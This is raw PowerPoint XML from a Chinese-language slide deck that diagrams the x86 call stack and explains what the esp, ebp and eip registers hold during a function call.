          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5448387" y="1404779"/>
            <a:ext cx="535126" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>(1WL)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="文本框 399">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01BC4033-C566-4857-86AB-ED04F27C31A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1202057"/>
            <a:ext cx="1559787" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>1WL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> ：一个字长</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011293EE-D26A-3D77-3E5B-F5E3ACA9460A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7153631" y="3344869"/>
            <a:ext cx="490061" cy="229323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>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200" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5165A057-1089-318B-4FE2-44287C1288ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7153631" y="3576801"/>
            <a:ext cx="490061" cy="229323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">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200" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1781DF10-26E8-3AC8-AB9E-D0A239D18DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7153629" y="3114264"/>
            <a:ext cx="490061" cy="229323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">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200" b="1" dirty="0" err="1"/>
              <a:t>eip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="499" name="Shape 640">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9AA60C9-F15F-6C2A-CC5C-3EC03B39F820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="494" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6239655" y="3691463"/>
            <a:ext cx="913976" cy="232876"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="502" name="Shape 640">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04F0B6FF-D453-4D85-B0DE-713E20EA084A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="493" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6341032" y="3459531"/>
            <a:ext cx="812599" cy="94169"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77" name="Shape 640">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0710D1F2-0F2D-C391-01A1-757F933C14E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6239659" y="4241246"/>
            <a:ext cx="0" cy="179495"/>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9" name="文本框 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{271DE24A-943D-87D1-ADB0-FD5AF6D8637A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6377254" y="3418047"/>
            <a:ext cx="388719" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="115" name="Shape 640">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F3A474E-ABD3-F0FF-DAE8-ABECB4CC0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="239" idx="3"/>
            <a:endCxn id="493" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6335689" y="3459531"/>
            <a:ext cx="817942" cy="876320"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="non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123" name="文本框 122">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4913AE0D-FAC3-D056-78F6-041106373751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6845812" y="3497908"/>
            <a:ext cx="579489" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="文本框 511">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{277FA558-E10C-4F2A-781B-8F931C034ECC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6122629" y="4234970"/>
            <a:ext cx="340639" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="514" name="Shape 640">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E113FA18-5635-EE73-AA98-106E76EA6ED8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6239659" y="3922801"/>
            <a:ext cx="0" cy="32518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Shape 640">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E78E3CB-7D0D-15A1-CFA1-879680D54515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="494" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6241211" y="3691463"/>
            <a:ext cx="912420" cy="735471"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Shape 640">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AF3181F-A11E-0340-6AFC-13AD4C16112B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="494" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6239655" y="3691463"/>
            <a:ext cx="913976" cy="549783"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent6"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent6"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="文本框 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38133661-85EC-E46B-CBD6-7A918C4A3820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119503" y="4000087"/>
            <a:ext cx="343765" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="文本框 489">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7506A8A1-AB47-01E1-F5A3-E35DD543A89F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6872843" y="3246398"/>
            <a:ext cx="579489" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27846046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 name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68FC96DA-737D-438D-8CF8-2C40F33E9360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652529" y="1311499"/>
            <a:ext cx="6096000" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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函数状态主要涉及三个寄存器 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>—— esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>esp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用来存储函数调用栈的栈顶地址，在压栈和退栈时发生变化。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用来存储当前函数状态的基地址，在函数运行时不变，可以用来索引确定函数参数或局部变量的位置。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>用来存储即将执行的程序指令的地址，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>依照 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的存储内容读取指令并执行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
